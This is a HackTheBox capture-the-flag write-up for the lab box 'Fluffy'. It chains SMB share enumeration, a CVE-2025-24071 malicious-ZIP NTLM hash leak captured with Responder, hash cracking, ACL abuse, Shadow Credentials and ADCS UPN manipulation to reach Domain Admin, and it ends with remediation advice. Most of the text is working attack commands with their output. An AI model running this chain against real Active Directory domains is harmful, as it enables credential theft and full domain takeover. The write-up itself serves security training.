HTB Fluffy: From Low-Priv Creds to Domain Admin via CVE-2025-24071 & Shadow Credentials

Introduction

Fluffy is a Windows Easy box from HackTheBox that simulates a realistic corporate Active Directory environment. The attack chain begins with low-privileged domain credentials and escalates to Domain Admin through multiple techniques: SMB enumeration, CVE-2025-24071 NTLM hash leak, hash cracking, BloodHound ACL abuse, Shadow Credentials, and ADCS certificate abuse.

Attack Overview

j.fleischman (given credentials)
    ↓
SMB IT Share (READ/WRITE)
    ↓
Upgrade_Notice.pdf → CVE-2025-24071 hint
    ↓
Upload malicious ZIP → Responder catches NTLMv2 hash
    ↓
Hashcat cracks → p.agila : prometheusx-303
    ↓
BloodHound: p.agila --GenericAll--> Service Account Managers
    ↓
bloodyAD: add p.agila to "Service Accounts"
    ↓
Shadow Credentials on winrm_svc → NT hash
    ↓
evil-winrm → USER FLAG
    ↓
BloodHound: winrm_svc --GenericWrite--> ca_svc
    ↓
pyWhisker: Shadow Credentials on ca_svc → NT hash
    ↓
UPN manipulation + ADCS certificate request as Administrator
    ↓
certipy auth → Administrator NT hash
    ↓
evil-winrm → ROOT FLAG

Setup

Add the following entry to /etc/hosts:

10.129.232.88 hostmaster.fluffy.htb dc01.fluffy.htb fluffy.htb

Set environment variables:

export IP=10.129.232.88
export HOST=fluffy.htb

Initial credentials: j.fleischman / J0elTHEM4n1990!

Reconnaissance (Nmap)

sudo nmap -sC -sV -p- --min-rate 5000 10.129.232.88

Key open ports:

Port	Service	Significance
53	DNS	Domain Controller
88	Kerberos	AD authentication
139/445	SMB	File shares
389/636	LDAP/LDAPS	AD directory
5985	WinRM	Remote management
3268/3269	GC LDAP	Global Catalog

The presence of Kerberos (88), LDAP (389), SMB (445), and WinRM (5985) confirms this is a Domain Controller.

SMB Enumeration

Listing shares with CrackMapExec:

crackmapexec smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares

Output:

SMB  DC01  [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB  DC01  Share        Permissions
SMB  DC01  -----        -----------
SMB  DC01  ADMIN$
SMB  DC01  C$
SMB  DC01  IPC$         READ
SMB  DC01  IT           READ,WRITE
SMB  DC01  NETLOGON     READ
SMB  DC01  SYSVOL       READ

The IT share has READ and WRITE access. Browse it using smbclient:

smbclient //10.129.232.88/IT -U 'j.fleischman%J0elTHEM4n1990!'

Contents:

Everything-1.4.1.1026.x64/
  Everything-1.4.1.1026.x64.zip
KeePass-2.58/
  KeePass-2.58.zip
Upgrade_Notice.pdf

Download and read Upgrade_Notice.pdf:

get Upgrade_Notice.pdf
pdftotext Upgrade_Notice.pdf -

The PDF lists critical unpatched CVEs:

CVE ID	Severity
CVE-2025-24071	Critical
CVE-2025-24996	Critical
CVE-2025-46785	High
CVE-2025-29968	High
CVE-2025-21193	Medium
CVE-2025-3445	Low

Exploiting CVE-2025-24071 (NTLM Hash Leak)

CVE-2025-24071 is a critical Windows File Explorer vulnerability. Windows Explorer automatically parses .library-ms files upon extraction from a ZIP archive. A crafted .library-ms file pointing to an attacker-controlled SMB server causes Explorer to connect to it, leaking the user’s NTLMv2 hash without any click.

A proof-of-concept is used to generate a malicious ZIP:

python3 cve.py -f MonFichierTest -i 10.10.14.165

Upload the ZIP to multiple directories in the IT share:

smbclient //10.129.232.88/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> put exploit.zip
smb: \> cd Everything-1.4.1.1026.x64
smb: \Everything-1.4.1.1026.x64\> put exploit.zip
smb: \> cd KeePass-2.58
smb: \KeePass-2.58\> put exploit.zip

Start Responder to capture NTLM authentication:

sudo responder -I tun0 -dwv

After a short wait, the hash is captured:

[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:033e3464daebc46c:0B85823E9517...

Crack the hash with Hashcat:

echo "p.agila::FLUFFY:033e3464daebc46c:0B85823E9517..." > hash.txt
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Result: prometheusx-303

Credentials obtained: p.agila / prometheusx-303

BloodHound Enumeration & ACL Abuse

Collect BloodHound data:

bloodhound-python -u p.agila -p 'prometheusx-303' -d fluffy.htb -dc dc01.fluffy.htb -c All

BloodHound reveals that p.agila has GenericAll over the Service Account Managers group, and members of that group have write access to members of Service Accounts (including winrm_svc).

Add p.agila to the Service Accounts group using bloodyAD:

bloodyAD -u 'P.AGILA' -p 'prometheusx-303' -d 'fluffy.htb' -H '10.129.232.88' \
  add groupMember "SERVICE ACCOUNTS" "P.AGILA"

Output: [+] P.AGILA added to SERVICE ACCOUNTS

Now p.agila has GenericWrite over winrm_svc.

Shadow Credentials Attack on winrm_svc

If you have write access to a user’s msDS-KeyCredentialLink attribute, you can add a public key and authenticate as that user via PKINIT without knowing the password. This is the Shadow Credentials attack.

Use bloodyAD to add shadow credentials for winrm_svc:

bloodyAD -u 'P.AGILA' -p 'prometheusx-303' -d 'fluffy.htb' -H '10.129.232.88' \
  add shadowCredentials "WINRM_SVC"

Output:

[+] KeyCredential generated with SHA256: d46db911be4cf6fb...
[+] TGT stored in ccache file winrm_svc_ye.ccache
NT: 33bd09dcd697600edf6b3a7af4875767

Connect via Evil-WinRM using the NT hash:

evil-winrm -i 10.129.232.88 -u 'WINRM_SVC' -H '33bd09dcd697600edf6b3a7af4875767'

Retrieve the user flag:

*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt

[redacted]

Privilege Escalation to Domain Admin via ADCS

From the winrm_svc shell, BloodHound shows that winrm_svc has GenericWrite over ca_svc (the certificate authority service account).

Use pywhisker to add shadow credentials for ca_svc:

pywhisker -u "WINRM_SVC" -H "33bd09dcd697600edf6b3a7af4875767" \
  -d "fluffy.htb" --dc-ip 10.129.232.88 \
  -t "CA_SVC" --action add -f ca_svc

Output:

[+] Updated the msDS-KeyCredentialLink attribute of CA_SVC
[+] Saved PFX certificate at: ca_svc.pfx
[*] Password: 2FLC5ksEYpvBqA5v0vVW

Authenticate as ca_svc to retrieve its NT hash:

certipy auth -pfx ca_svc.pfx -password '2FLC5ksEYpvBqA5v0vVW' \
  -dc-ip 10.129.232.88 -username 'CA_SVC' -domain 'fluffy.htb'

Output: [*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8

Now abuse ADCS: temporarily change ca_svc’s UPN to Administrator@fluffy.htb (from the winrm_svc shell):

Set-ADUser -Identity "CA_SVC" -UserPrincipalName "Administrator@fluffy.htb"

Request a certificate as Administrator:

certipy req -u 'CA_SVC@fluffy.htb' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' \
  -dc-ip 10.129.232.88 -dc-host dc01.fluffy.htb -target 10.129.232.88 \
  -ca 'fluffy-DC01-CA' -template 'User'

Output:

[*] Got certificate with UPN 'Administrator@fluffy.htb'
[*] Saved certificate to 'administrator.pfx'

Restore the original UPN:

Set-ADUser -Identity "CA_SVC" -UserPrincipalName "CA_SVC@fluffy.htb"

Authenticate as Administrator using the forged certificate:

certipy auth -pfx administrator.pfx -dc-ip 10.129.232.88

Output: [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

Connect as Domain Admin:

evil-winrm -i 10.129.232.88 -u 'Administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'

Retrieve the root flag:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

[redacted]

Key Takeaways

Vulnerability	Root Cause	Remediation
CVE-2025-24071 (NTLM leak via `.library-ms`)	Windows Explorer automatically parses library files upon extraction	Apply March 2025 Patch Tuesday updates; block outbound SMB on firewalls
GenericAll ACL abuse	Overly permissive ACE allowing group membership modification	Regularly audit ACLs using BloodHound CE; enforce least privilege
Shadow Credentials	Write access to `msDS-KeyCredentialLink` attribute enables account takeover	Monitor Event ID 5136 for attribute changes; alert on unexpected modifications
ADCS UPN manipulation	Certificate template allows requestor to set UPN in SAN	Review certificate templates; restrict enrollment rights; disable UPN-based SAN if not required

Resources

Nmap — Network discovery and port scanning
CrackMapExec — Post-exploitation tool for AD environments
Responder — LLMNR/NBT-NS/mDNS poisoner and NTLM hash catcher
Hashcat — Advanced password recovery
BloodHound — Active directory privilege escalation path mapping
bloodyAD — Active Directory privilege escalation framework
pywhisker — Shadow Credentials attack tool
certipy — Active Directory Certificate Services enumeration and abuse
evil-winrm — WinRM shell for penetration testing

Introduction

Attack Overview

Setup

Reconnaissance (Nmap)

SMB Enumeration

Exploiting CVE-2025-24071 (NTLM Hash Leak)

BloodHound Enumeration & ACL Abuse

Shadow Credentials Attack on winrm_svc

Privilege Escalation to Domain Admin via ADCS

Key Takeaways

Resources

Related posts